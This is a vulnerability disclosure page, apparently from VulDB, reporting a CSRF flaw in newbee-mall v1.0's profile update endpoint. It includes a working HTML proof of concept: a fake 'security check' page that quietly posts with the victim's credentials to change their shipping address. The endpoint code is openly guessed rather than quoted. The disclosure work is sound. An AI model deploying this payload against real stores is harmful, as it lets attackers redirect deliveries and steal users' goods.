Submit #752805: newbee-ltd newbee-mall v1.0 CSRFinfo

Titlenewbee-ltd newbee-mall v1.0 CSRF
Description# CSRF Vulnerability in Personal Information Update ## Summary A **CSRF vulnerability** exists in the personal information update endpoint `/personal/updateInfo`. Attackers can modify users' personal information including shipping addresses, potentially redirecting deliveries to attacker-controlled locations. ## Vulnerability Details ### Configuration-Level Issue **File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java` ```java @Configuration public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer { public void addInterceptors(InterceptorRegistry registry) { registry.addInterceptor(newBeeMallLoginInterceptor) .addPathPatterns("/personal/updateInfo"); // ❌ Only authentication check, no CSRF protection } } ``` ### Endpoint-Level Code Analysis Based on project structure, the personal information update endpoint likely follows this pattern: ```java @PostMapping("/personal/updateInfo") @ResponseBody public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) { NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY); // ❌ No CSRF token validation // ⚠️ Allows modification of sensitive user data including address mallUser.setUserId(user.getUserId()); return mallUserService.updateUserInfo(mallUser); } ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ⚠️ Can modify shipping address to attacker's location 3. ⚠️ Combined with order CSRF, enables complete delivery hijacking ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>Profile Verification Required</title> </head> <body> <h2>???? Security Check: Verify Your Information</h2> <p>We're updating our security settings. Please verify your account...</p> <script> // Modify user's shipping address fetch('http://localhost:28089/personal/updateInfo', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ nickName: 'User', introduceSign: 'Normal user', address: '123 Attacker Street, Hacker City, 99999', // Attacker's address // Other user fields remain unchanged }) }) .then(response => response.json()) .then(data => { document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>'; }); </script> </body> </html> ``` ## Impact **User information tampering and delivery hijacking** - Attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users. --- **CVSS Score**: 7.3 (High)
Source⚠️ https://github.com/newbee-ltd/newbee-mall/issues/114
User
 flashzyc (UID 92850)
Submission02/05/2026 11:59 (4 months ago)
Moderation02/18/2026 07:56 (13 days later)
StatusDuplicate
VulDB entry346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery]
Points0

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!